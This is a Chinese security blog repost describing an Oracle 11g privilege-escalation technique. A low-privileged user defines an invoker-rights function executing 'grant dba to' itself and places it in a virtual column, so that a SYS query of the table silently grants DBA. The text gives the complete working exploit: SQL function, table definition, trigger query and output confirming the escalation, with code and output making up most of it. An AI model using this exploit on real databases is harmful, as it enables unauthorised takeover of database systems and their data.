记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Oracle 11g 利用virtual columns 获取DBA权限

2013-01-16 11:54

Oracle 11g 利用virtual columns 获取DBA权限

作者:Birdarmy

微安全- 新浪微博安全组技术博客  首发,转载请注明出处

[感谢Linux520的Birdarmy同学友情投稿]

在Oracle 11g中系统提供了一个新功能 Virtual columns 。

官网描述:

A virtual column is not stored on disk. Rather, the database derives the values in a virtual column on demand by computing a set of expressions or functions. Virtual columns can be used in queries, DML, and DDL statements.

系统利用virtual columns,在需要使用此列数据的时候才调用运算或者函数,不在硬盘上保存结果,类似view功能。

virtual columns 语法

column_name [datatype] [GENERATED ALWAYS] AS (expression) [VIRTUAL]

例如:

SQL> create table test(a int,b int,c generated always as (a+b) virtual);

Table created.

SQL> insert into test (a ,b ) values (10,20);

1 row created.

SQL> select * from test;

A            B              C

———- ———- ———-

10         20         30

由于此功能可以使用函数,如果用户同时拥有创建函数的权限,那么就可以利用oracle提升权限中常用的授权函数。在虚拟列中使用授权函数,当sys进行查询的时候,就会触发事件,或者其余任何方式,只要触发这个函数即可,就可以成功将用户 提升到DBA权限

例:

首先我们创建一个用户birdarmy,让其拥有创建表和函数的权限,为了方便测试这里我直接赋予他们connect和resource权限。

SQL> create user birdarmy identified by 123456;

User created.

SQL> grant connect,resource to birdarmy;

Grant succeeded.

以birdarmy权限进行登录,创建利用函数和表。

[oracle@ORA-TEST-03 ~]$ sqlplus birdarmy@gc12

SQL*Plus: Release 11.2.0.2.0 Production on Mon May 7 15:36:12 2012

Copyright (c) 1982, 2010, Oracle.  All rights reserved.

Enter password:

Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 – 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

创建一个授权函数,使用grant dba to birdarmy进行提升权限。当sys等具有高级赋权功能的用户调用此函数的时候,就将birdarmy的权限提升为DBA。

SQL> CREATE OR REPLACE FUNCTION GRANT_DBA_TO_USER (v IN INT)

RETURN INT AUTHID CURRENT_USER  DETERMINISTIC

AS

PRAGMA AUTONOMOUS_TRANSACTION;

BEGIN

EXECUTE IMMEDIATE ‘grant dba to birdarmy‘;

RETURN 0;

END GRANT_DBA_TO_USER;

/

创建一个测试表 exploit_virtual_columns,在虚拟列上使用授权函数。

SQL> create table exploit_virtual_columns(a int,b generated always AS (GRANT_DBA_TO_USER (a)) virtual);

插入一条数据,这样用户查询exploit_virtual_columns表的时候才会触发虚拟列的函数。

SQL> insert  into exploit_virtual_columns (a) values (1);

查看当前用户的权限,仅为connect,resource。

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
—————————— —————————— — — —
BIRDARMY                       CONNECT                        NO  YES NO
BIRDARMY                       RESOURCE                       NO  YES NO

[oracle@ORA-TEST-03 ~]$ sqlplus / as sysdba

SQL*Plus: Release 11.2.0.2.0 Production on Mon May 7 15:42:43 2012

Copyright (c) 1982, 2010, Oracle.  All rights reserved.

Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 – 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

用sys用户查询exploit_virtual_columns,触发虚拟列中GRANT_DBA_TO_USER函数。

SQL> select * from birdarmy.exploit_virtual_columns;

A              B

———- ———-

1              0

[oracle@ORA-TEST-03 ~]$ sqlplus birdarmy@gc12

SQL*Plus: Release 11.2.0.2.0 Production on Mon May 7 15:43:14 2012

Copyright (c) 1982, 2010, Oracle.  All rights reserved.

Enter password:

Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 – 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

查看用户权限,成功获取DBA权限

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
—————————— —————————— — — —
BIRDARMY                       CONNECT                        NO  YES NO
BIRDARMY                       DBA                            NO  YES NO
BIRDARMY                       RESOURCE                       NO  YES NO

 

 

知识来源: minisafe.sinaapp.com/69.html

阅读:350880 | 评论:0 | 标签:安全技术 dba oracle virtual columns 权限提升

想收藏或者和大家分享这篇好文章→复制链接地址

“Oracle 11g 利用virtual columns 获取DBA权限”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云